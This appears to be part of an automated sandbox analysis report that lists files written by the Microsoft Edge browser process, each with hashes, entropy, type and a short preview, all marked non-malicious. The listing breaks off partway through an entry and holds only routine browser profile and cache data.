                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1546
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.344921734504277
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YcFGJ/I3RdsTcZVMdmRdsTAyZFRudFGRw6C1E6ma3yeesw6maPsRds7ZC52Hu8bd:YcgCzs4tsJfc7aleeBkEs1CgHu8bxo+
                                                                                                                                                                                                                                                                                                                                                        MD5:11C15C6D953C0CEDBC92C4858AD07B72
                                                                                                                                                                                                                                                                                                                                                        SHA1:C5ABC83D3B6788DC4227E9BCCFADFBA196B96227
                                                                                                                                                                                                                                                                                                                                                        SHA-256:DD4C6D1949B6FB1E91AE5118848BE96AA769368E153FF96BB9366CAF2B289BC4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:3F0EA2C4E854B6C4AE0AB1FA500419D4921FD9B10A5BC932A024F166CF0B0E541930CA80DF2FB329EC2EACF98B32526D321E34FC687B455CEE1A28D0DE31AD9C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378659974696719","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378659976516876","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1546
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.344921734504277
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YcFGJ/I3RdsTcZVMdmRdsTAyZFRudFGRw6C1E6ma3yeesw6maPsRds7ZC52Hu8bd:YcgCzs4tsJfc7aleeBkEs1CgHu8bxo+
                                                                                                                                                                                                                                                                                                                                                        MD5:11C15C6D953C0CEDBC92C4858AD07B72
                                                                                                                                                                                                                                                                                                                                                        SHA1:C5ABC83D3B6788DC4227E9BCCFADFBA196B96227
                                                                                                                                                                                                                                                                                                                                                        SHA-256:DD4C6D1949B6FB1E91AE5118848BE96AA769368E153FF96BB9366CAF2B289BC4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:3F0EA2C4E854B6C4AE0AB1FA500419D4921FD9B10A5BC932A024F166CF0B0E541930CA80DF2FB329EC2EACF98B32526D321E34FC687B455CEE1A28D0DE31AD9C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378659974696719","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378659976516876","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12488
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.208346372402335
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:strJ99QTryDigabatSuypMsbusZihUkXiL8hbV+FXnICQA66WpaFIMYKPXYJ:strPGKSu4MsbufhBbGXLQx6WpaTYj
                                                                                                                                                                                                                                                                                                                                                        MD5:D6A23E205CBCF8669991C117245F1948
                                                                                                                                                                                                                                                                                                                                                        SHA1:0EA51195821CC4602372516E43730CA25B457207
                                                                                                                                                                                                                                                                                                                                                        SHA-256:2CCA5E442D4FFE06F9BA17209340411FC752B968A7850BDB6D921A49F30A5E49
                                                                                                                                                                                                                                                                                                                                                        SHA-512:BEDF4D085532971FA771E52679189E878FA3BCD99EAA26FD4B84CAF9CEE7B463AA90B3F5A376D0203D75C832B83F5CDB3E7688D24BD9A4056B5A8FD7D85F1C3F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376067972524486","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):38626
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.5549808317669775
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:7rKOLL7pLGLpmIWPA+fkd8F1+UoAYDCx9Tuqh0VfUC9xbog/OV+EjeHrw2ifY+qr:7rKOLdcpmIWPA+fkdu1jaP0eU2ifY7sK
                                                                                                                                                                                                                                                                                                                                                        MD5:633743C66C287FA1C8AE26CAC4D3D24B
                                                                                                                                                                                                                                                                                                                                                        SHA1:5E6F07062D677B1A795A714933BA3C3B1E0999C4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F11EDBCEB491F1978DF0BE0C310C68F26FBB1A6D972BAF11E9DA488D8E15FF58
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F26BF95F621A2DE8A1D155D056789D8E20DF5B7F4905C041A9747B7D3D5263DEB6574747AE352364476DD7D9CF8FD61467C237408151A25B85FA6CA3B877FD8
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376067971858364","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376067971858364","location":5,"ma
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):113998
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.579413829346636
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:Aa906yxPXfOrr1lhCe1nL/rmL/rSZXsCjaWNcHM1LLKWp+R:79LyxPXfOrr1lMe1nL/CL/SXsA84+wK
                                                                                                                                                                                                                                                                                                                                                        MD5:984F89D8DF353F5F85465415AA4DC289
                                                                                                                                                                                                                                                                                                                                                        SHA1:5F28EDABC27B5A01D88AF4D67BABE8B76B6411B7
                                                                                                                                                                                                                                                                                                                                                        SHA-256:AA43381B553E65665959EAAAD57FD60C13B623B54C76ACA7C419D2DFA24B55B5
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0661F74F469FA22DAC51056EB27F8CCC0E80D7AEF8B251558637FC8D4A591775D1862BFFD498F8E5C40F69546D623392948E99B8F028CA02729DC588C44544D7
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):188241
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.38264205537903
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:LCIQOUcllurBcwh/rEIOL/OaMMnH5KzL8UDnSAUVUveP:d6cw1ERL/xnZK0UjScvc
                                                                                                                                                                                                                                                                                                                                                        MD5:18B00508974B4CA9BE6A7597781AE679
                                                                                                                                                                                                                                                                                                                                                        SHA1:1266001E55EB2623CC3F7A0D637861CB68C31E56
                                                                                                                                                                                                                                                                                                                                                        SHA-256:AEAF181228C2CF9B1F9C5CDD2CF9E867C8B84FAF94D3C86DB4F4101C20AA11CB
                                                                                                                                                                                                                                                                                                                                                        SHA-512:283C184C6DD2C520023AF38EB8244776FD645377D7A96804B8457EC081ACB91BC6A3104D4F54D6D7F2D0A19A8D035DDD2DB93B4321B839368CFEA88EDFF1745C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:0\r..m..........rSG.....0....z3.................;I....x..........,T.8..`,.....L`.....,T...`......L`......Rc.!|?....exports...Rcb9......module....Rc~......define....Rb........amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m.R..b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....A..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....V...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):24
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                                                                        MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                                                                        SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                                                                        SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:0\r..m..................
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:wzFQyXl/lKtn/lxE0tllStIwvTn:weKKW006aTn
                                                                                                                                                                                                                                                                                                                                                        MD5:BE6CCF040564E87C81626FBB0C44880B
                                                                                                                                                                                                                                                                                                                                                        SHA1:0F35B795BFEFEBD02AB6772B6C02886B752859F1
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4587253427545B26FC5B3A0F0D66F39A153B7949D5C5737579AFD1CEA274A885
                                                                                                                                                                                                                                                                                                                                                        SHA-512:321A94866A6EE08218B85C1C7DF9B9187A916E416BCDACFA20C9AF6F97D15440CFC5112DA39B0F5B0685B9D08CBE35301625E5D1CC4F06CF93F86C6A72AC24BC
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:@....l..oy retne.........................X....,...................v./.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:wzFQyXl/lKtn/lxE0tllStIwvTn:weKKW006aTn
                                                                                                                                                                                                                                                                                                                                                        MD5:BE6CCF040564E87C81626FBB0C44880B
                                                                                                                                                                                                                                                                                                                                                        SHA1:0F35B795BFEFEBD02AB6772B6C02886B752859F1
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4587253427545B26FC5B3A0F0D66F39A153B7949D5C5737579AFD1CEA274A885
                                                                                                                                                                                                                                                                                                                                                        SHA-512:321A94866A6EE08218B85C1C7DF9B9187A916E416BCDACFA20C9AF6F97D15440CFC5112DA39B0F5B0685B9D08CBE35301625E5D1CC4F06CF93F86C6A72AC24BC
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:@....l..oy retne.........................X....,...................v./.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
